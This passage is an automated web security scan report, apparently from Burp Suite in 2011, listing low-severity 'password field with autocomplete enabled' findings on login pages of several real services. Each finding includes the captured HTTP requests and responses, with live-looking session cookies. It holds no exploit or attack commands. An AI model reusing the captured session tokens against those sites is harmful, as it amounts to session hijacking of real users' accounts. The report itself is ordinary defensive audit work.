<td><input id="loginPage:SiteTemplate:siteLogin:loginComponent:loginForm:password" type="password" name="loginPage:SiteTemplate:siteLogin:loginComponent:loginForm:password" value="" /></td>
...[SNIP]...

19.2. https://cam.infusionsoft.com/cart/process  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://cam.infusionsoft.com
Path:   /cart/process

Issue detail

The page contains a form with the following action URL:The form contains the following password fields with autocomplete enabled:

Request

GET /cart/process?packageCode=standard&affiliate=0 HTTP/1.1
Host: cam.infusionsoft.com
Connection: keep-alive
Referer: http://www.infusionsoft.com/pricing
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESS9dd4d016da30aa43b8e02b23417e983e=8cabe0c3be364f38f383997676b59504; LeadSource=www.infusionsoft.com; __utmz=84293057.1303693620.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __v1192_=46276302; Type=%28none%29; Referer=http%3A%2F%2Fwww.infusionsoft.com%2F; ISFunnel=ms; __v1192_vexclude=false; __v1192_nFactors=1; __v1192_recipeID=68334; 46276302_campaignID=2630; __utma=84293057.878895164.1303693620.1303693620.1303693620.1; __utmc=84293057; __utmv=84293057.|1=funnelSrc=ms=1,; __utmb=84293057.5.10.1303693620

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=C137FB5113EEA15E639C83767C422E04; Path=/; Secure
Content-Type: text/html;charset=utf-8
Content-Language: en-US
Date: Mon, 25 Apr 2011 01:40:09 GMT
Content-Length: 33219

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN"
                       "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<title>Infusionsoft - Purchase Infusionsoft</title>
<link rel="stylesheet" href="http
...[SNIP]...
<div id="contentFloatWrapper">

<form action="/cart/purchase" method="post" name="purchaseForm" id="purchaseForm" >
<input type="hidden" name="org.codehaus.groovy.grails.SYNCHRONIZER_TOKEN" value="0eaefc08-f4b4-4587-8bdc-20945c1571b7" id="org.codehaus.groovy.grails.SYNCHRONIZER_TOKEN" />
...[SNIP]...
<td><input type="password" name="password" minlength="7" maxlength="100" value="" class="required password" id="password" />
<div class="desc">
...[SNIP]...
<td><input type="password" class="required" equalTo="#password" name="confirmPassword" value="" id="confirmPassword" /></td>
...[SNIP]...

19.3. https://cam.infusionsoft.com/login/auth  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://cam.infusionsoft.com
Path:   /login/auth

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /login/auth HTTP/1.1
Host: cam.infusionsoft.com
Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESS9dd4d016da30aa43b8e02b23417e983e=8cabe0c3be364f38f383997676b59504; LeadSource=www.infusionsoft.com; __utmz=84293057.1303693620.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __v1192_=46276302; Referer=http%3A%2F%2Fwww.infusionsoft.com%2F; Type=%28none%29; ISFunnel=ms; __v1192_vexclude=false; __v1192_nFactors=1; __v1192_recipeID=68334; 46276302_campaignID=2630; __utma=84293057.878895164.1303693620.1303693620.1303693620.1; __utmc=84293057; __utmv=84293057.|1=funnelSrc=ms=1,; JSESSIONID=694DD931C6D8D8F6172B3D402F920BD2

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=utf-8
Content-Language: en-US
Content-Length: 2629
Date: Mon, 25 Apr 2011 01:39:53 GMT

<html>
   <head>
       <title>Login</title>
<link rel="stylesheet" href="/css/main.css"/>
<link rel="stylesheet" href="/css/CAM_template.css"/>
<link rel="shortcut icon" href="/images/favicon.ico
...[SNIP]...
</div>
           <form action='/j_spring_security_check' method='POST' id='loginForm' class='cssform'>
               <p>
...[SNIP]...
</label>
                   <input type='password' class='text_' name='j_password' id='j_password' />
               </p>
...[SNIP]...

19.4. http://controlcase.com/change_password.php  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://controlcase.com
Path:   /change_password.php

Issue detail

The page contains a form with the following action URL:The form contains the following password fields with autocomplete enabled:

Request

GET /change_password.php HTTP/1.1
Host: controlcase.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=208121856.1303664485.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=f4764231133ed3c705cc7d27a7b0b2ed; _pk_id.3.4216=e72cf29c5d1c4bcd.1303664485.1.1303664740.1303664485; _pk_ses.3.4216=*; __utma=208121856.1998732058.1303664485.1303664485.1303664485.1; __utmc=208121856; __utmb=208121856.15.10.1303664485

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 17:14:45 GMT
Server: Apache/2.0.55 (Win32)
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 19836

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conten
...[SNIP]...
</legend>
<form name="change_passwd" method='post' action='change_password.php' onSubmit="javascript:document.change_passwd.todo.value='change'">
<input type="hidden" name="PW" value="0" />
...[SNIP]...
<td><input name="password" type="password" id="PW__pass" size="50" /></td>
...[SNIP]...
<td><input name="new_password" type="password" id="PW__pass_new" size="50" /></td>
...[SNIP]...
<td><input name="confirm_password" type="password" id="PW__pass_confirm" size="50" /></td>
...[SNIP]...

19.5. http://controlcase.com/logon_page.php  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://controlcase.com
Path:   /logon_page.php

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /logon_page.php HTTP/1.1
Host: controlcase.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=208121856.1303664485.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); _pk_id.3.4216=e72cf29c5d1c4bcd.1303664485.1.1303664491.1303664485; _pk_ses.3.4216=*; __utma=208121856.1998732058.1303664485.1303664485.1303664485.1; __utmc=208121856; __utmb=208121856.2.10.1303664485; PHPSESSID=f4764231133ed3c705cc7d27a7b0b2ed

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 17:12:15 GMT
Server: Apache/2.0.55 (Win32)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 20435

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conten
...[SNIP]...
</legend>
<form method='post' action='process_form_PW.php' name="login_frm">
<input type="hidden" name="PW" value="0" />
...[SNIP]...
<td><input name="password" type="password" id="PW__pass" size="50" /></td>
...[SNIP]...

19.6. http://engine03.echomail.com/icomee-regs/trial/MonitoringTrial.jsp  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://engine03.echomail.com
Path:   /icomee-regs/trial/MonitoringTrial.jsp

Issue detail

The page contains a form with the following action URL:The form contains the following password fields with autocomplete enabled:

Request

GET /icomee-regs/trial/MonitoringTrial.jsp?m=2 HTTP/1.1
Host: engine03.echomail.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=F4978EDED768B0F757D9681D37B31DEC; Path=/icomee-regs
Content-Type: text/html;charset=UTF-8
Content-Language: en
Date: Mon, 25 Apr 2011 00:38:30 GMT
Content-Length: 20313


<script src="/icomee-regs/js/common.js"></script>
<script src="/icomee-regs/js/uitags.js"></script>
<script src="/icomee-regs/js/validation.js"></script>
<sc
...[SNIP]...
<!-- imageready slices (echomail.psd) -->
<form name="QuickTrialForm" method="post" action="/icomee-regs/trial/QuickTrial.do;jsessionid=F4978EDED768B0F757D9681D37B31DEC">
<table width="1000" border=0 cellpadding=0 cellspacing=0>
...[SNIP]...
<td width="240" align="left"><input type="password" name="password" maxlength="50" value="" style="width:180px;"></td>
...[SNIP]...
<td align="left"><input type="password" name="confPassword" maxlength="50" value="" style="width:180px;"></td>
...[SNIP]...

19.7. http://engine03.echomail.com/icomee-regs/trial/QuickTrial.jsp  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://engine03.echomail.com
Path:   /icomee-regs/trial/QuickTrial.jsp

Issue detail

The page contains a form with the following action URL:The form contains the following password fields with autocomplete enabled:

Request

GET /icomee-regs/trial/QuickTrial.jsp HTTP/1.1
Host: engine03.echomail.com
Proxy-Connection: keep-alive
Referer: http://www.echomail.com/pricing/pricing_sm.asp
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=FEEE9E501044CA2B9A9053B24A6194EF; __utmz=20441063.1303692234.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=20441063.944278103.1303692234.1303692234.1303692234.1; __utmc=20441063; __utmb=20441063.4.10.1303692234

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en
Date: Mon, 25 Apr 2011 00:44:21 GMT
Content-Length: 21295


<script src="/icomee-regs/js/common.js"></script>
<script src="/icomee-regs/js/uitags.js"></script>
<script src="/icomee-regs/js/validation.js"></script>
<sc
...[SNIP]...
<!-- imageready slices (echomail.psd) -->
<form name="QuickTrialForm" method="post" action="/icomee-regs/trial/QuickTrial.do">
<table width="1000" border=0 cellpadding=0 cellspacing=0>
...[SNIP]...
<td width="240" align="left"><input type="password" name="password" maxlength="50" value="" style="width:180px;"></td>
...[SNIP]...
<td align="left"><input type="password" name="confPassword" maxlength="50" value="" style="width:180px;"></td>
...[SNIP]...

19.8. https://login.silverlight.net/login/signin.aspx  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://login.silverlight.net
Path:   /login/signin.aspx

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

POST /login/signin.aspx?returnurl=http%3a%2f%2fwww.silverlight.net%2fdefault.aspx HTTP/1.1
Host: login.silverlight.net
Connection: keep-alive
Referer: https://login.silverlight.net/login/signin.aspx?returnurl=http%3a%2f%2fwww.silverlight.net%2fdefault.aspx
Cache-Control: max-age=0
Origin: https://login.silverlight.net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Content-Type: application/x-www-form-urlencoded
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=fkagjzuszeopmbf34exlkeap; forums.ReturnUrl=http://www.silverlight.net/default.aspx; omniID=d56272fa_cf2f_4cb1_a058_6b695009e628; s_cc=true; s_sq=msstoslvnet%3D%2526pid%253Dlogin.silverlight.net/login/signin.aspx%2526pidt%253D1%2526oid%253Dfunctiononclick%252528event%252529%25257Bjavascript%25253AWebForm_DoPostBackWithOptions%252528newWebForm_PostBackOptions%252528%252522ctl00%252524ma%2526oidt%253D2%2526ot%253DSUBMIT
Content-Length: 233

__LASTFOCUS=&__EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=%2FwEPDwULLTEyNjc1MTYyMTZkZO%2FafV0CJRP%2B2ILM8De2o6zEhcVm&__EVENTVALIDATION=%2FwEWAgLNm4PjCwL0iqHzAh9XOTMNktAsCvWQ8c3pqepo2pjW&ctl00%24mainMid
...[SNIP]...

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Set-Cookie: forums.ReturnUrl=http://www.silverlight.net/default.aspx; domain=login.silverlight.net; expires=Sun, 24-Apr-2011 16:03:39 GMT; path=/
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
Date: Sun, 24 Apr 2011 15:53:39 GMT
Content-Length: 15083


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">


<head><title>
   The Of
...[SNIP]...
</p>
<form name="aspnetForm" method="post" action="signin.aspx?returnurl=http%3a%2f%2fwww.silverlight.net%2fdefault.aspx" onsubmit="javascript:return WebForm_OnSubmit();" onkeypress="javascript:return WebForm_FireDefaultButton(event, 'ctl00_mainMiddle_loginForm_btnLogin')" id="aspnetForm">
<div>
...[SNIP]...
</label>
<input name="ctl00$mainMiddle$loginForm$txtPassword" type="password" id="ctl00_mainMiddle_loginForm_txtPassword" tabindex="2" style="width:200px;" /></span>
...[SNIP]...

19.9. https://online.americanexpress.com/myca/logon/us/action  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://online.americanexpress.com
Path:   /myca/logon/us/action

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /myca/logon/us/action?request_type=LogonHandler&Face=en_US&DestPage=https%3A%2F%2Fwww99.americanexpress.com%2Fmyca%2Fusermgt%2Fus%2Faction%3Frequest_type%3Dauthreg_PPLogin%26Face%3Den_US%26lgnsrc%3DPP%26REDIRECT_URL%3Dhttps%3A%2F%2Fwww152.americanexpress.com%2Fpremium%2Fcredit-report-monitoring%2Fenroll.do%3FSC%3D%26Face%3Den_US&Face=en_US HTTP/1.1
Host: online.americanexpress.com
Connection: keep-alive
Referer: http://landing.americanexpress.com/v2.php?type=v2&gclid=CNqttZH1tagCFQbe4AodEirYCA&
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SaneID=173.193.214.243-1303676103708679

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 20:27:45 GMT
Server: IBM_HTTP_Server
Pragma: no-cache
Cache-Control: no-store
Expires: Sun, 24 Apr 2011 20:27:45 GMT
LastModified: Sun, 24 Apr 2011 20:27:45 GMT
Set-Cookie: NSC_nf3-x-vt-mphpo-c=ffffffff97a3d0fb45525d5f4f58455e445a4a4299f9;Version=1;path=/
Keep-Alive: timeout=15, max=31
Connection: Keep-Alive
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Set-Cookie: sroute=957221386.58148.0000; path=/
Vary: Accept-Encoding, User-Agent
Content-Length: 39093

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">



...[SNIP]...
<!-- End: Next generation iNAV Changes -->
       

   <form name="frmLogon" id="frmLogon" action="/myca/logon/us/action?request_type=LogLogonHandler&location=us_logon2" method="post">

   <fieldset class="fieldSetStyle">
...[SNIP]...
</label>
                                                       
                           <input class="rounded_text" title="Enter the Password" type="password" name="Password" id="Password" maxlength="20" size="25" style="margin-left: 6px;" />
                           </fieldset>
...[SNIP]...

19.10. https://portal.actividentity.com/  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://portal.actividentity.com
Path:   /

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET / HTTP/1.1
Host: portal.actividentity.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=262184092.1303674298.1.1.utmgclid=CNnXlJP1tagCFQ5-5Qodm1pYEg|utmccn=(not%20set)|utmcmd=(not%20set); __utma=262184092.1583896653.1303674298.1303674298.1303674298.1; __utmc=262184092

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 20:43:54 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Set-Cookie: portal_=deleted; expires=Sat, 24-Apr-2010 20:43:53 GMT; path=/; domain=portal.actividentity.com
Set-Cookie: portal_hash=deleted; expires=Sat, 24-Apr-2010 20:43:53 GMT; path=/; domain=portal.actividentity.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 13869

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conten
...[SNIP]...
<br>
               <form method="post">
       <input type='hidden' name='fmlogin' value='1'>
...[SNIP]...
<br><input style='margin-top:4px;width:145px;' type="password" name = "portal_password" ></td>
...[SNIP]...

19.11. https://psr.infusionsoft.com/index.jsp  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://psr.infusionsoft.com
Path:   /index.jsp

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /index.jsp HTTP/1.1
Host: psr.infusionsoft.com
Connection: keep-alive
Referer: https://psr.infusionsoft.com/index.jsp?msg=Whoa%2C+easy+there+tiger.+You%27re+gonna+need+to+login+before+you+can+view+this+page.
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=1D05F63F025804F51DC0C60D07CE712E; SESS9dd4d016da30aa43b8e02b23417e983e=8cabe0c3be364f38f383997676b59504; LeadSource=www.infusionsoft.com; __utmz=84293057.1303693620.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __v1192_=46276302; Referer=http%3A%2F%2Fwww.infusionsoft.com%2F; Type=%28none%29; ISFunnel=ms; __v1192_vexclude=false; __v1192_nFactors=1; __v1192_recipeID=68334; 46276302_campaignID=2630; __utma=84293057.878895164.1303693620.1303693620.1303693620.1; __utmc=84293057; __utmv=84293057.|1=funnelSrc=ms=1,; __utmb=84293057.6.10.1303693620

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Date: Mon, 25 Apr 2011 01:40:29 GMT
Content-Length: 11274


<html>
<head>
<!-- This TAG MUST COME FIRST, or else IE will ignore it -->
<meta http-equiv="X-UA-Compatible" c
...[SNIP]...
colspan="3" width="100%" height="100%" align="center"
style="vertical-align: middle;">

<form onsubmit="return validate();" id="loginForm" name="loginForm" action="/login/processLogin.jsp" method="post"><input type="hidden" id="csrf_token" name="csrf_token" />
...[SNIP]...
<td colspan="3" class="login-field-td"><input
id="password"
class="login-field" type="password"
name="password"
value=""/>

</td>
...[SNIP]...

19.12. https://secure.lifelock.com/portal/login  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://secure.lifelock.com
Path:   /portal/login

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /portal/login HTTP/1.1
Host: secure.lifelock.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=182152376.1303613800.1.1.utmgclid=CNG9kumTtKgCFUNd5Qod6WW7Cw|utmccn=(not%20set)|utmcmd=(not%20set); LIFELOCK_PERSISTENT=Sun%2C%2024%20Apr%202011%2002%3A56%3A42%20GMT_99; 480-PV=3114#4/24/2011/2/56/45; C3UID=13014572191303613803; JSESSIONID=A9556607FC26978DF3DD3EBCCA32DF76.lptom02_8000; isWebstoreEnrollmentPage=true; TS376161=b910cd8565f99bb66a75426772fe17675438784dc7b0156d4db392b3; LifeLockEnrollment=promoCode=GOOGSEARCH13; LIFELOCK_SESSION=Sun%2C%2024%20Apr%202011%2002%3A56%3A42%20GMT_99%3DSun%2C%2024%20Apr%202011%2002%3A56%3A42%20GMT_22; __utma=182152376.1080477552.1303613800.1303613800.1303613800.1; __utmc=182152376; __utmb=182152376.6.10.1303613800; 480-CT=3114#4/24/2011/2/56/45|1#4/24/2011/3/8/53

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 03:18:25 GMT
Pragma: no-cache
Cache-Control: no-cache, max-age=0, must-revalidate, max-age=900
Set-Cookie: isWebstoreEnrollmentPage=""; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Content-Language: en-US
Expires: Sun, 24 Apr 2011 03:33:25 GMT
Connection: Keep-Alive
Content-Type: text/html;charset=UTF-8
Set-Cookie: TS376161=4f378fe59c5b44a496743c6b1b66858a5438784dc7b0156d4db39682; Path=/
Vary: Accept-Encoding
Content-Length: 5205

<!DOCTYPE html PUBLIC "-//W3C//DTD html 4.0 Transitional//EN" >
<html>
   <head>
       <title>LifeLock Member Portal | Sign In</title>
       <link href="../styles/login.css" rel="stylesheet" type="text/css" med
...[SNIP]...
<div id="login-content">
               
   <form id="main-form" method="post" action="../?wicket:interface=:26:loginForm::IFormSubmitListener::"><div style="width:0px;height:0px;position:absolute;left:-100px;top:-100px;overflow:hidden">
...[SNIP]...
<span class="form-input">
                       <input name="password" type="password" maxlength="65" size="40" id="txt-password" style="width: 208px;" value=""/>
                   </span>
...[SNIP]...

19.13. https://secure.lifelock.com/portal/login  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://secure.lifelock.com
Path:   /portal/login

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /portal/login HTTP/1.1
Host: secure.lifelock.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=182152376.1303613800.1.1.utmgclid=CNG9kumTtKgCFUNd5Qod6WW7Cw|utmccn=(not%20set)|utmcmd=(not%20set); LIFELOCK_PERSISTENT=Sun%2C%2024%20Apr%202011%2002%3A56%3A42%20GMT_99; 480-PV=3114#4/24/2011/2/56/45; C3UID=13014572191303613803; JSESSIONID=A9556607FC26978DF3DD3EBCCA32DF76.lptom02_8000; isWebstoreEnrollmentPage=true; TS376161=b910cd8565f99bb66a75426772fe17675438784dc7b0156d4db392b3; LifeLockEnrollment=promoCode=GOOGSEARCH13; LIFELOCK_SESSION=Sun%2C%2024%20Apr%202011%2002%3A56%3A42%20GMT_99%3DSun%2C%2024%20Apr%202011%2002%3A56%3A42%20GMT_22; __utma=182152376.1080477552.1303613800.1303613800.1303613800.1; __utmc=182152376; __utmb=182152376.6.10.1303613800; 480-CT=3114#4/24/2011/2/56/45|1#4/24/2011/3/8/53

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 03:09:21 GMT
Pragma: no-cache
Cache-Control: no-cache, max-age=0, must-revalidate, max-age=900
Set-Cookie: isWebstoreEnrollmentPage=""; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Content-Language: en-US
Expires: Sun, 24 Apr 2011 03:24:21 GMT
Connection: Keep-Alive
Content-Type: text/html;charset=UTF-8
Set-Cookie: TS376161=1ab02caf07f2b0502c7d92542a374a3f5438784dc7b0156d4db39461; Path=/
Vary: Accept-Encoding
Content-Length: 5204

<!DOCTYPE html PUBLIC "-//W3C//DTD html 4.0 Transitional//EN" >
<html>
   <head>
       <title>LifeLock Member Portal | Sign In</title>
       <link href="../styles/login.css" rel="stylesheet" type="text/css" med
...[SNIP]...
<div id="login-content">
               
   <form id="main-form" method="post" action="../?wicket:interface=:3:loginForm::IFormSubmitListener::"><div style="width:0px;height:0px;position:absolute;left:-100px;top:-100px;overflow:hidden">
...[SNIP]...
<span class="form-input">
                       <input name="password" type="password" maxlength="65" size="40" id="txt-password" style="width: 208px;" value=""/>
                   </span>
...[SNIP]...

19.14. https://secure.lifelock.com/portal/login  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://secure.lifelock.com
Path:   /portal/login

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /portal/login HTTP/1.1
Host: secure.lifelock.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=182152376.1303613800.1.1.utmgclid=CNG9kumTtKgCFUNd5Qod6WW7Cw|utmccn=(not%20set)|utmcmd=(not%20set); LIFELOCK_PERSISTENT=Sun%2C%2024%20Apr%202011%2002%3A56%3A42%20GMT_99; 480-PV=3114#4/24/2011/2/56/45; C3UID=13014572191303613803; JSESSIONID=A9556607FC26978DF3DD3EBCCA32DF76.lptom02_8000; isWebstoreEnrollmentPage=true; TS376161=b910cd8565f99bb66a75426772fe17675438784dc7b0156d4db392b3; __utma=182152376.1080477552.1303613800.1303613800.1303613800.1; __utmc=182152376; __utmb=182152376.4.10.1303613800; LifeLockEnrollment=promoCode=GOOGSEARCH13; LIFELOCK_SESSION=Sun%2C%2024%20Apr%202011%2002%3A56%3A42%20GMT_99%3DSun%2C%2024%20Apr%202011%2002%3A56%3A42%20GMT_22; 480-CT=3114#4/24/2011/2/56/45|1#4/24/2011/3/8/45

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 03:09:21 GMT
Pragma: no-cache
Cache-Control: no-cache, max-age=0, must-revalidate, max-age=900
Set-Cookie: isWebstoreEnrollmentPage=""; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Content-Language: en-US
Expires: Sun, 24 Apr 2011 03:24:21 GMT
Connection: Keep-Alive
Content-Type: text/html;charset=UTF-8
